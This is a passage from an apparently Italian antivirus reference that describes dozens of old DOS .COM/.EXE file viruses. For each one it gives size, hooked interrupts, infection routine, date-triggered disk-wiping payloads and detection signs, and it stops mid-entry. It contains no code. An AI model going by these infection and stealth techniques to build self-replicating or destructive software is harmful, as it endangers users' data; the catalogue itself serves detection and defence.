[Stupid 1] Nome del Virus: Stupid 1, July 4. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 743 Byte. Procedura eseguita: 1) Se la parola all'indirizzo 0000:01FEh Φ FFFFh, il virus non infetta nessun file. 2) Quando il virus infetta i file, infetta tutti i file non infetti con estensione *.COM nella cartella in uso. Quando il numero di infezioni Φ minore di 2, inizia ad infettare tutti i file con estensione *.COM nella directory superiore finchΦ il numero Φ superire a 2 o ha raggiunto la directory principale. Controlla che la data di sistema sia il 4 luglio e che l'ora sia 0:00, 1:00, 2:00, 3:00, 4:00, o 5:00. Se ci sono queste condizioni, il virus distrugge tutti i dati del dischetto. Metodo di rilevazione: 1) Data ed ora dei file infetti sono cambiate. 2) Il Byte 0003h di un file con estensione *.COM infetto Φ 1Ah. 3) Un file con estensione *.COM infetto mostra il seguente messaggio : "Abort, Retry, Ignore, Fail?" , "Fail on INT 24" (2) - "Impotence error reading users disk" (0) - "Program too big to fit in memoria" (1) - "Cannot load COMMAND, system halted" (3)"Joker!" and "*.com." 4) Il virus mostra il messaggio quando esegue un file infetto. [Klf-356] Nome del Virus: Klf-356. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 356 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φun file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 356 Byte. [April 998] Nome del Virus: April 998. Tipo di Virus: Virus da file. Infetta i file con estensione *.EXE maggiori di 10h. Il virus Φ residente in memoria. Lunghezza del Virus: 998 Byte (file), 1.104 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando si esegue un file infetto in aprile 1998, controlla che sia giα residente in memoria. In questo caso esegue il file infetto. Il virus rimane residente in cima alla MCB (memoria control block) ma nel limite dei 640K del DOS. Danni: Il virus scrive informazioni parassite sul drive C dal settore 0 al settore Feh quando la data di sistema Φ aprile di qualsiasi anno. Sintomi: La memoria libera diminuisce di 1.104 Byte. Note: Questo virus non infetta i file chiamati: "SCAN*", "CLEA*", "VIRS*","F-PR*" OR "CPAV*" [17-768] Nome del Virus: 17-768. Tipo di Virus: Virus da file. Infetta i file con estensione *.COM ed *.EXE minori di 59.920 Byte. Residente in memoria. Lunghezza del Virus: 768 (300h) Byte (file), 800 (320h) Byte (memoria). Vettore PC agganciato: INT 09h, INT 21h. Processo di infezione: Questo virus Φ una variante del virus November-17th: se la data di sistema Φ 17 novembre ed il valore di [40:46E] non Φ lo stesso del valore di backup del virus [40:46E], quando il virus Φ in memoria, distugge il disco in uso iniziando dal settore 1 fino al settore 8. La prima volta che si esegue un programma infettato da November 17th, il virus si installa in memoria in cima alla memoria di sistema ma nel limite dei 640K del DOS. Danni: Il virus distrugge il disco in uso dal settore 1 al settore 8. Sucessivamente il virus inserisce informazioni parassite in questi settori quando la data Φ il 17 novembre. Sintomi: La lunghezza dei file aumenta di 855 Byte. La memoria libera accessibile diminuisce di 896 Byte. Note: Il virus November 17th fu individuato nel febbraio 1992. La sua origine e la sua prima individuazione sono sconosciuti, ma si diffuse a Roma, nel dicembre del 1991. November 17th Φ un virus residente in memoria ed infetta i file con estensione *.EXE ed *.COM, compreso il COMMAND.COM. [Jeff] Nome del Virus: Jeff. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 815-820 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. Infetta solo un file alla volta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 815-820 Byte. [Ill] Nome del Virus: Ill. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.016 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. Infetta solo un file alla volta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.016 Byte. [Iero-512-560] Nome del Virus: Iero-512-560. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 512 o 560 Byte. Vettore PC agganciato: INT 21h, INT 08h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. 2) Intercetta l'INT 08h per controllare l'ora di sistema. Ad un'ora scelta a caso, il virus mostra il seguente messaggio: "Mulier pulchr aest janua diab oli , .. via iniq uitatis, scorpion is percussio. .St. Ieronim.." Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 2) Con il virus residente in memoria la memoria libera accessibile diminuisce di 1. Si pu≥ rilevare usando MEM.EXE. Metodo di rilevazione: I file infetti aumentano di 512 o 560 Byte. [Iernim] Nome del Virus: Iernim. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 570 or 600 Byte. Vettore PC agganciato: INT 21h, INT 08h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. 2) Intercetta l'INT 08h per controllare l'ora di sistema. In un momento scelto a caso, il virus mostra il seguente messaggio: "Mulier pulchra est janua diaboli , .. via iniquitatis, scorpionis percussio ..St. Ieronim.." Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 2) Con il virus residente in memoria la memoria libera accessibile diminuisce di 1. Si pu≥ rilevare usando MEM.EXE. Metodo di rilevazione: I file infetti aumentano di 570 o 600 Byte. [Horror] Nome del Virus: Horror. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.112-1.182 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h. 3) Controlla che il COMMAND.COM che ha avviato il sistema sia infetto. Se "NO", il virus lo infetta e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Distrugge tutti i dati sull'hard disk. (Ogni variante di questo virus ha una propria ora di infezione). Note: Il software Soft-mice Φ distrutto dai file infetti con estensione *.EXE. Metodo di rilevazione: I file infetti aumentano di 1.112-1.182 Byte. [I-B] Nome del Virus: I-B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM in tutte le directory e li infetta. Questo virus controlla che sia luned∞. Se "SI", il virus distrugge tutti i dati sull'hard disk. Danni: 1) A volte distrugge tutti i dati sull'hard disk. 2) Sovrascrive il file originale con il codice virale, questo corrompe i file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Cr-2480b] Nome del Virus: Cr-2480b. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 2.480 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 2.480 Byte. [Md-354] Nome del Virus: Md-354. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 354 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 354 Byte. [Los-693] Nome del Virus: Los-693. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 693 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: C'Φ un flag del virus nella partizione (il valore iniziale Φ zero). Il valore aumenta di 1 ogni volta che il virus infetta un file. Quando il flag Φ maggiore di 223, il virus intercetta l'INT 08h. Un minuto dopo, i caratteri cominciano a cadere sullo schermo. Il virus poi blocca il sistema. Metodo di rilevazione: I file infetti aumentano di 693 Byte. [Bung1422] Nome del Virus: Bung1422. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.442 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che la data di sistema sia il 20 settembre. Se "SI", il virus mostra il seguente messaggio : "Jonhan Bonhn - September 20 1980 - L E D Z E P P E L I N -" Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh). Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus lo infetta direttamente. Se il programma da eseguire Φ un file con estensione *.EXE, cerca un file non infetto con estensione *.COM e lo infetta. Infine, il virus ripristina l'INT 24h. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.422 Byte. [Src-377] Nome del Virus: Src-377. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 377 Byte. Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM in tutte le directory e le infetta. Danni: Se l'hard disk ha pi∙ di una partizione ed il sistema Φ avviato dalla seconda partizione (D drive), tutti i dati di questo drive vengono alterati. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 377 Byte. [Mini-195] Nome del Virus: Mini-195. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 195 o 218 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione #*COM ("#" indica un carattere da 'A' a 'Z', come A*.COM, F*.COM, X*.COM) nella cartella in uso, e lo infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 195 o 218 Byte. [Gold] Nome del Virus: Gold. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 612 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Dopo aver infettato il file, il virus ha il 50% possibilitα di tornare alla funzione originale. Un'altra possibilitα Φ che il virus mostri dei caratteri a caso e chiuda senza eseguire la funzione originale. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 612 Byte. [Hard-Day] Nome del Virus: Hard-Day. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 662 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione COM file, il virus lo infetta. Danni: Se la data corrente Φ luned∞ e l'ora Φ dopo le 18:00, il virus blocca il sistema dopo aver mostrato il seguente messaggio: "Hard day's night !" Note: 3) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 662 Byte. [In83-584] Nome del Virus: In83-584. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 584 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 584 Byte. [Tankard] Nome del Virus: Tankard. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 493 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM file, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 493 Byte. [1241] Nome del Virus: 1241 Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.560-1.570 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: Il virus controlla che la data corrente sia il 13 novembre 1990. Se "SI", il virus mostra il seguente messaggio: "St Cruz, Dili, 1991 Nov 12. Lusitania Expresso, Freedom for East Timor !" Quindi riavvia il sistema. Altrimenti controlla che sia residente in memoria. Se "NO", si carica in memoria alta. Infine intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.560-1.570 Byte. [104] Nome del Virus: 104. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 400 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM file, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 400 Byte. [Trident] Nome del Virus: Trident. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 2.385-2.395 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. 2) Controlla che il comando DIR sia usato. Se "SI", tutti i file puliti, con estensione *.EXE e *.COM aperti con questo comando, diventano infetti. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.385-2.395 Byte. [Explode] Nome del Virus: Explode. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Procedura eseguita: 1) Cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. 2) Controlla che il mese corrente sia aprile o maggio. Se "SI", il virus mostra il seguente messaggio : "Your hard drive is about to explode !" Il virus distrugge tutti i dati sull'hard disk. In caso non sia nΦ aprile nΦ maggio, il virus mostra: "Program too big to fit in memoria." Danni: 1) Alcune volte distrgge tutti i dati sull'hard disk. 2) Sovrascrive il file originale con il codice virale, questo altera i file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [End-Of] Nome del Virus: End-Of.. Tipo di Virus: Virus da file (Infetta i file con estensione *.COM). Lunghezza del Virus: 783 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=3Bh) per infettare i file. Quando accede ad altre cartelle, tutti i file non infetti con estensione *.COM nella directory originale vengono infettati. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 783 Byte. [Copyr-Ug] Nome del Virus: Copyr-Ug. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 766 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 766 Byte. [Chuang] Nome del Virus: Chuang. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 970 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta solo un file alla volta). 2) Controlla che il giorno corrente sia successivo al 12, e l'ora sia 22:00 o pi∙ tardi. Se ci sono queste condizioni, il virus distrugge tutti i dati sull'hard disk. Danni: Il virus alcune volte distrugge tutti i dati sull'hard disk. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 970 Byte. [Ancient] Nome del Virus: Ancient. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 783 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta solo un file alla volta). 2) Pulisce lo schermo o mostra diversi colori di ' * ' finchΦ viene premuto un tasto. A quel punto, viene emesso uno strano suono per 5 minuti. DopodichΦ il virus torna al programma originale. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 3) Reinfetta i file. Metodo di rilevazione: I file infetti aumentano di 783 Byte. [Adolf_Hitler] Nome del Virus: Adolf_Hitler. Tipo di Virus: Virus da fil. (Infetta i file con estensione *.COM). Lunghezza del Virus: 475 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 475 Byte. [Fob] Nome del Virus: Fob. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: .1.750-1950 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Ci sono il 50% di possibilitα che il virus mostri un messaggio chiedendo all'utente di inserire la parola: "SLOVAKIA." Il virus aspetta fino a quando l'utente non inserise questa parola, quindi termina il programma. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti chiedendo all'utente di inserire la parola: "SLOVAKIA." e non smettono finchΦ l'utente non la digita. [Signs] Nome del Virus: Signs. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 720 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che il giorno corrente sia venerd∞. Se "SI", l'immagine sullo schermo gira per un minuto. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 720 Byte. [Shield] Nome del Virus: Shield. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 172 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *. COM, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 2) La funzione del programma infetto Φ diversa dall'originale. I file infetti non sono in grado di infettare altri file ma possono mostrare un messaggio se il mese corrente Φ febbraio. Il messaggio Φ il seguente: "I greet you user . I am COM-CHILD, son of The Breeder Virus. Look out for the RENAME-PROBLEM !" Metodo di rilevazione: I file infetti aumentano di 172 Byte. [Wishes] Nome del Virus: Wishes. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 970 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che il giorno corrente sia venerd∞ 13. Se "SI", il virus distrugge tutti i dati sull'hard disk. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Il virus alcune volte distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 970 Byte. [439] Nome del Virus: 439. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 439 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 439 Byte. [4-A] Nome del Virus: 4-A. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 450-460 Byte. Procedura eseguita: Il virus mostra il seguente messaggio : "-----Hello , I am virus ! -----". Il virus cerca un file non infetto con estensione *.COM nella cartella in uso e lo infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 3) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: 1) I file infetti mostrano il messaggio sopra riportato quando vengono eseguiti. 2) I file infetti aumentano di 450-460 Byte. [330] Nome del Virus: 330. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 330 Byte. Procedura eseguita: 1) Cerca un file non infetto con estensione *.COM nella cartella in uso e lo infetta. (Infetta solo un file alla volta). 2) Controlla che il mese corrente sia Luglio. Se "SI", il virus mostra il seguente messaggio : "[330] by ICE-9." Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 330 Byte. [203] Nome del Virus: 203. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 203 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 203 Byte. [Mr-Vir] Nome del Virus: Mr-Vir. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 508 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 508 Byte. [Nazgul] Nome del Virus: Nazgul. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 266 Byte. Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso e li infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 266 Byte. [Napc] Nome del Virus: Napc. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 729 Byte. Procedura eseguita: Il virus cerca tutti i file puliti con estensione *.COM ed *.EXE nella cartella in uso, quindi li infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 729 Byte. [Little] Nome del Virus: Little. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 665 Byte. Procedura eseguita: Il virus cerca i file con estensione *.COM non infetti nella cartella in uso, quindi li infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto non Φ stato agganciato l'INT 24h. Metodo di rilevazione: I file infetti aumentano di 665 Byte. [Atte-629] Nome del Virus: Atte-629. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 629 Byte. Procedura eseguita: Il virus cerca i file con estensione *.COM non infetti nella cartella in uso, quindi li infetta. (Infetta solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto non Φ stato agganciato l'INT 24h. Metodo di rilevazione: I file infetti aumentano di 629 Byte. [A&A] Nome del Virus: A&A. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 506 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 506 Byte. [Magnitogorski-3] Nome del Virus: Magnitogorski-3. Tipo di Virus: Virus da file. (I file con estensione *.COM e *.EXE). Lunghezza del Virus: 3.000 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 3.000 Byte. [Lpt-Off] Nome del Virus: Lpt-Off. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 256 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus procede alla sua infezione. Danni: Nessuno. Note: Appare un messaggio d'errore mentre scrive in quanto non Φ stato agganciato l'INT 24h. Metodo di rilevazione: I file infetti aumentano di 256 Byte. [Kiwi-550] Nome del Virus: 